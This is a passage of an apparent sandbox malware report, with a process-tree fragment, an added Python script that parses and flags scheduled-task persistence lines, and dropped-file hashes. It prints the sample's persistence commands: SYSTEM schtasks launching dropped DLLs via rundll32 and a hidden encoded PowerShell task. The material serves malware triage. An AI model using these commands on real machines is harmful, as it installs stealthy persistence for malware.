depth 2 | PID 3328 | C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dDIGKoNsMZUYTlNI\cweSAjAw\LJhTtMP.dll",#1 /site_id 525403
    - Blocklisted process makes network request
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
depth 3 | PID 4180 | C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "ClHbhijVssadMpWzU"
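Every persistence step in this tree goes through schtasks: a one-shot task under the logged-on user carries an encoded PowerShell command (the powershell.EXE node above shows it spawning gpupdate.exe /force, so the encoded text is a Group Policy refresh after the Defender policy writes), while SYSTEM tasks launch the dropped BPTxocp.exe, rundll32 with export #1 of the dropped DLLs, and four task definitions imported from XML files in the excluded directories. The Python below is an added example, not part of the report: it parses the schtasks options (including the \"-escaped quotes inside /TR), decodes -EncodedCommand payloads as base64 over UTF-16LE text, extracts the DLL and export from rundll32 actions and flags SYSTEM tasks that survive a reboot (on-logon trigger or XML definition). The task lines are copied from the tree above; the helper names are the example's own.

```python
"""Pull persistence details out of schtasks command lines from a sandbox
process tree and decode any PowerShell -EncodedCommand they carry.

Added example, not part of the tria.ge report.  TASK_LINES are copied from
the process tree; the parsing code and its names are illustrative.
"""
import base64
import re

# Constructed input: schtasks lines copied from the report.
TASK_LINES = [
    r'schtasks /CREATE /TN "gGPbIFfGV" /SC once /ST 09:01:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'schtasks /CREATE /TN "ygwXmmYWmIOQZqgey" /SC once /ST 00:29:01 /RU "SYSTEM" /TR "\"C:\Windows\Temp\dDIGKoNsMZUYTlNI\cbiAkEIOWvTrFua\BPTxocp.exe\" c9 /site_id 525403 /S" /V1 /F',
    r'schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JuPVqtTuU\HMQNMm.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "HnhGGmYUcuANzZs" /V1 /F',
    r'schtasks /CREATE /TN "ClHbhijVssadMpWzU" /SC once /ST 08:54:11 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\dDIGKoNsMZUYTlNI\cweSAjAw\LJhTtMP.dll\",#1 /site_id 525403" /V1 /F',
    r'schtasks /CREATE /TN "HnhGGmYUcuANzZs2" /F /xml "C:\Program Files (x86)\JuPVqtTuU\ZDJrKBR.xml" /RU "SYSTEM"',
]

# /OPT value, where the value is either "quoted, with \" escapes inside" or a bare token.
OPT_RE = re.compile(r'/(TN|TR|SC|ST|RU|XML)\s+(?:"((?:[^"\\]|\\.)*)"|(\S+))', re.I)
# rundll32 <dll>,<export> as written in /TR (after the \" escapes are undone).
DLL_RE = re.compile(r'rundll32(?:\.exe)?\s+"?([^",]+?)"?\s*,\s*#?(\w+)', re.I)
# -<flag> <token>; powershell.exe accepts any prefix of -EncodedCommand (-e, -ec, -enc ...).
FLAG_RE = re.compile(r"-(\w+)\s+([A-Za-z0-9+/=]+)")


def parse_schtasks(cmdline):
    """Return the schtasks options of interest, keyed by lowercase name, quotes unescaped."""
    opts = {}
    for name, quoted, bare in OPT_RE.findall(cmdline):
        opts[name.lower()] = (quoted if quoted else bare).replace('\\"', '"')
    return opts


def decode_encoded_commands(text):
    """Decode every -EncodedCommand (base64 of UTF-16LE script text) found in text."""
    out = []
    for flag, arg in FLAG_RE.findall(text):
        if not "encodedcommand".startswith(flag.lower()):
            continue
        try:
            out.append(base64.b64decode(arg, validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            pass  # not base64 or not UTF-16: leave it for a human
    return out


def analyse_task(cmdline):
    """Summarise one schtasks /CREATE line for triage."""
    o = parse_schtasks(cmdline)
    tr = o.get("tr", "")
    dll = DLL_RE.search(tr)
    return {
        "task": o.get("tn"),
        "trigger": o.get("sc") or ("xml" if "xml" in o else None),
        "run_as": o.get("ru"),
        "action": tr or o.get("xml"),
        "runs_as_system": (o.get("ru") or "").upper() == "SYSTEM",
        "rundll32_export": (dll.group(1), dll.group(2)) if dll else None,
        "decoded_powershell": decode_encoded_commands(tr),
    }


def system_persistence(lines):
    """Task names that run as SYSTEM and come back after reboot (ONLOGON or XML-defined)."""
    hits = []
    for line in lines:
        r = analyse_task(line)
        if r["runs_as_system"] and (r["trigger"] or "").lower() in ("onlogon", "xml"):
            hits.append(r["task"])
    return hits


if __name__ == "__main__":
    for line in TASK_LINES:
        r = analyse_task(line)
        print(f"{r['task']:<22} run_as={r['run_as']:<7} trigger={r['trigger']:<8} "
              f"dll={r['rundll32_export']} ps={r['decoded_powershell']}")
    print("SYSTEM persistence:", system_persistence(TASK_LINES))
```

The one-shot SYSTEM tasks (ygwXmmYWmIOQZqgey, ClHbhijVssadMpWzU) are deleted by the tree's own schtasks /DELETE lines once they have fired, which is why system_persistence() keys on the trigger rather than on /RU alone; the XML-defined tasks cannot be judged from the command line because their triggers live in the .xml files, so they are flagged for a look at the file.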
Downloads
Filesize 2KB
MD5    f86e4aa80c3636bd2d89b26f16944821
SHA1   d67d851761101d6888532b1d8981e59749815531
SHA256 26496563d08764d24aac79813a24c0b3b4e3eb77c70963137d37b06da33e38be
SHA512 a34d90e22db028cd5fa353f8c20b02d5470bcace24288cc140731783320dac8a2da830ae0cbcc4332160cd5493fc502fee1b96ecb48fa177b948f1de6a86d206

Filesize 2KB
MD5    465d1c6c0c39085c6f49d59ce0faae46
SHA1   ee77e1d6ac5b816b73d16d920f66e4eef1f74932
SHA256 d127f0dab3546e174dd603f0b4ea763c49021bf9e3850bf5492819e8d8c79f40
SHA512 5b54d4a76d807f88930a1106359beec521a01fd772458cf95adcf02fcc62d41b1ad5d6157c3260a8f43bed846e50d410b6393d902334f0f64000fd1b34886d3b

Filesize 2KB
MD5    0f6a5c3c42184de1007209823f615084
SHA1   1d5eee096124898853a3acf943c6504d4d43dc71
SHA256 b16e62ea0756a50eed6336b04c0f1098584c634ea397fe9d94445e017f2dab6d
SHA512 49a191ae4773df976d17f6782f81308aa05de5de49bed0d8e081ba76d123f42dd65bd4e2424ebb1e0e15cf683008b2109e78221fff073c50f8e98fd18ea41187

Filesize 2KB
MD5    ce531d9fd2f4844b512efde24eef99a5
SHA1   524ea55f9e554e3a5de3c7c7529ab35fd9ffec7c
SHA256 1a9587379e692267f2298bc2d07416dfeb6b9e05538e3a2fd8a5d60a1f7fa85b
SHA512 fe3f9cd66820f39b116cfcda1d63cf95a4f09857c47b67cc10b76d261273ffc23df57a3e7e27432f5b27b9607529422f4601001567463cc457d6d6a72984ad94

Filesize 2KB
MD5    910b700b72815410bd840c269987bdfd
SHA1   66c3c7d94875ce72a5256872538102602dee6974
SHA256 bff6b0e09b6208dca8a95bef052cbb0aca38053531a92bdfcc4a67a484598e9b
SHA512 e43c7a8141d27109ca5ccc22b0b9e45db9d31c6ae91a33b9b1e8412454479d479875f334e5b818ec4cb14682f564dee32e745c66957e1236086f1176b6a8e719

Filesize 2KB
MD5    6cf293cb4d80be23433eecf74ddb5503
SHA1   24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Filesize 64B
MD5    5caad758326454b5788ec35315c4c304
SHA1   3aef8dba8042662a7fcf97e51047dc636b4d4724
SHA256 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA512 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Filesize 6.2MB (2 identical entries in the report)
MD5    9f0021812f5e22fe7b0f3cefe26a195a
SHA1   5ced140a2cbe6410517a0d0a9c7546ac32a2478e
SHA256 258f0ba8c03b44589373787899a00b7b0c0e4200a037973747d86a67a62c9826
SHA512 500c03d11b955b907456c73957bdce1d1c92520de745d692c20c989307d491acb627bec1bed5373100388200e83d1665badb1c88211cf44043d4b8280002cb90

Filesize 6.6MB (6 identical entries in the report)
MD5    596361ceff627d88c0b64a99d7ce57fd
SHA1   41261f7ceaf1f1cf71fede5954563638bdb907ea
SHA256 c69c8b871de4c294c326cfe7b6ac01cc41adeb1934810e23c00d337af732ca33
SHA512 90e437b08d3c55ac3602cb5fb830ab054d75c7def0864c53f3e7c2e6feda37da0fd944d6f39c528b8438e9dbcc7ee965ef970030bd125951a1e543d8910352f5

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize 1KB
MD5    33b19d75aa77114216dbc23f43b195e3
SHA1   36a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256 b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 11KB
MD5    18407d15d8bacd5a8d4560af0ae2c620
SHA1   00c22604aeec6d55e506f0878eddf79b905c3497
SHA256 c01cd8957e2e8cee4177a248dfea58ea20f0473d658e87d8fbc691f136a5e76f
SHA512 c44d2cc1b4f24d405c20827c6bbdc633687a0e620ad44f6b89aa7f227a59c3bd259425a8ad2c8c633b3f5a711e11cad24cf371c8c14179eb156b23fe85d25407

Filesize 6.2MB (2 identical entries in the report)
MD5    16cc8a6d587c6ff14eb9f2aaf69f5b18
SHA1   9ce52f12684d6fe312127ec241a7b1aff0c8f435
SHA256 28498c5efe02ba69bf7692a83440e6c0e557c5c69d3fd9aadc7ba5df60d8b16b
SHA512 fe2ee7aaef4dbdcc70e972faa687af506606efdcff482035cf65f2bd687dd6096145471c897b6b271474a5635592ce99a5cb8eda27a4ac58d122fccc30a4ced1

Filesize 4KB
MD5    95dff56d8cd88f087cd0e41b6b33e474
SHA1   470455c138b03a1f8e0f51b4c43f4976ffb59e75
SHA256 c7118f3013c0ca2abaff842399a47630405c66a9f8b003c48baf31b11fd8cdc1
SHA512 a82f640863b3fcd93cd10f7990c598d3c070101be3f0d5af92a4178c166959fde6cb304078518a33d5dddc1ad7bcad297ee8acfcc1c0095b024521ba623f7cd7

Filesize 268B
MD5    a62ce44a33f1c05fc2d340ea0ca118a4
SHA1   1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732